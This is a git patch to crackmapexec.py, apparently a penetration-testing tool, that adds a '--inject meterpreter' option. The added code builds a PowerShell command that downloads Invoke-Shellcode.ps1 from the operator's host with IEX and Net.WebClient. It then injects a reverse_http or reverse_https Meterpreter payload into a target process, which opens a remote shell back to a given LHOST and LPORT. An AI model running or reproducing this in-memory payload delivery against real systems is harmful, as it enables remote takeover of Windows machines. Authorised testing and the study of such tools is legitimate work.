From 0362c9fcb384a9b0a4059f7b6ff29cf162b61be2 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Wed, 7 Oct 2015 19:34:05 -0600 Subject: [PATCH] Added option to directly inject meterpreter into memory using Invoke-Shellcode --- crackmapexec.py | 40 ++++++++++++++++++++++++++++++---------- 1 file changed, 30 insertions(+), 10 deletions(-) diff --git a/crackmapexec.py b/crackmapexec.py index f2cc9b9e..2ae1e12c 100755 --- a/crackmapexec.py +++ b/crackmapexec.py @@ -2661,7 +2661,19 @@ def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurl def inject_pscommand(localip): - if args.inject == 'shellcode': + if args.inject == 'meterpreter': + command = """ + IEX (New-Object Net.WebClient).DownloadString('http://{}/Invoke-Shellcode.ps1'); + Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(localip, + args.met, + args.met_options[0], + args.met_options[1]) + if args.procid: + command += " -ProcessID {}".format(args.procid) + + command += ';' + + elif args.inject == 'shellcode': command = """ IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-Shellcode.ps1'); $WebClient = New-Object System.Net.WebClient; @@ -2997,11 +3009,13 @@ if __name__ == '__main__': cgroup.add_argument("-x", metavar="COMMAND", dest='command', help="Execute the specified command") cgroup.add_argument("-X", metavar="PS_COMMAND", dest='pscommand', help='Excute the specified powershell command') - xgroup = parser.add_argument_group("Shellcode/EXE/DLL Injection", "Options for injecting Shellcode/EXE/DLL's in memory using PowerShell") - xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll'}, help='Inject Shellcode, EXE or a DLL') + xgroup = parser.add_argument_group("Shellcode/EXE/DLL/Meterpreter Injection", "Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell") + xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll', 'meterpreter'}, help='Inject Shellcode, EXE, DLL or Meterpreter') xgroup.add_argument("--path", type=str, help='Path to the Shellcode/EXE/DLL you want to inject on the target systems') - xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL into (if omitted, will inject within the running PowerShell process)') + xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)') xgroup.add_argument("--exeargs", type=str, help='Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)') + xgroup.add_argument("--met", choices={'reverse_http', 'reverse_https'}, dest='met', help='Specify the Meterpreter to inject') + xgroup.add_argument("--met-options", nargs=2, metavar=('LHOST', 'LPORT'), dest='met_options', help='Meterpreter options') bgroup = parser.add_argument_group("Filesystem Interaction", "Options for interacting with filesystems") bgroup.add_argument("--list", metavar='PATH', help='List contents of a directory') @@ -3022,13 +3036,19 @@ if __name__ == '__main__': log.setLevel(logging.INFO) if args.inject: - if not args.path: - print_error("You must specify a '--path' to the Shellcode/EXE/DLL to inject") - sys.exit(1) + if args.inject != 'meterpreter': + if not args.path: + print_error("You must specify a '--path' to the Shellcode/EXE/DLL to inject") + sys.exit(1) - elif args.path: - if not os.path.exists(args.path): - print_error('Unable to find Shellcode/EXE/DLL at specified path') + elif args.path: + if not os.path.exists(args.path): + print_error('Unable to find Shellcode/EXE/DLL at specified path') + sys.exit(1) + + elif args.inject == 'meterpreter': + if not args.met_options or not args.met: + print_error('You must specify a Meterpreter and it\'s options using \'--met\' and \'--met-options\'' ) sys.exit(1) if os.path.exists(args.target[0]):